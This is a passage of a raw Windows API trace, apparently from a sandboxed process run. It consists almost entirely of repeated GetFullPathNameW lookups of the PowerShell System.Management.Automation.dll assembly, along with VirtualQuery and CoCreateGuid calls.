nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.295] VirtualQuery (in: lpAddress=0x12bbd0, lpBuffer=0x12ca90, dwLength=0x30 | out: lpBuffer=0x12ca90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.297] VirtualQuery (in: lpAddress=0x12bbd0, lpBuffer=0x12ca90, dwLength=0x30 | out: lpBuffer=0x12ca90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.299] VirtualQuery (in: lpAddress=0x12bbd0, lpBuffer=0x12ca90, dwLength=0x30 | out: lpBuffer=0x12ca90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.300] VirtualQuery (in: lpAddress=0x12bbd0, lpBuffer=0x12ca90, dwLength=0x30 | out: lpBuffer=0x12ca90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.300] VirtualQuery (in: lpAddress=0x12b2c0, lpBuffer=0x12c180, dwLength=0x30 | out: lpBuffer=0x12c180*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.300] VirtualQuery (in: lpAddress=0x12b350, lpBuffer=0x12c210, dwLength=0x30 | out: lpBuffer=0x12c210*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.301] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.301] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.302] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.302] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.302] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.302] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.303] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.303] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.303] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.303] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.304] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.304] VirtualQuery (in: lpAddress=0x12b700, lpBuffer=0x12c5c0, dwLength=0x30 | out: lpBuffer=0x12c5c0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.304] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.304] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.305] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.305] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.305] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0xe65b2b3, Data2=0xd6cb, Data3=0x4524, Data4=([0]=0xa3, [1]=0x77, [2]=0x5b, [3]=0xe1, [4]=0x49, [5]=0x9c, [6]=0x73, [7]=0xcf))) returned 0x0 [0068.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.307] VirtualQuery (in: lpAddress=0x12b2c0, lpBuffer=0x12c180, dwLength=0x30 | out: lpBuffer=0x12c180*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.307] VirtualQuery (in: lpAddress=0x12b350, lpBuffer=0x12c210, dwLength=0x30 | out: lpBuffer=0x12c210*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.308] VirtualQuery (in: lpAddress=0x12b570, lpBuffer=0x12c430, dwLength=0x30 | out: 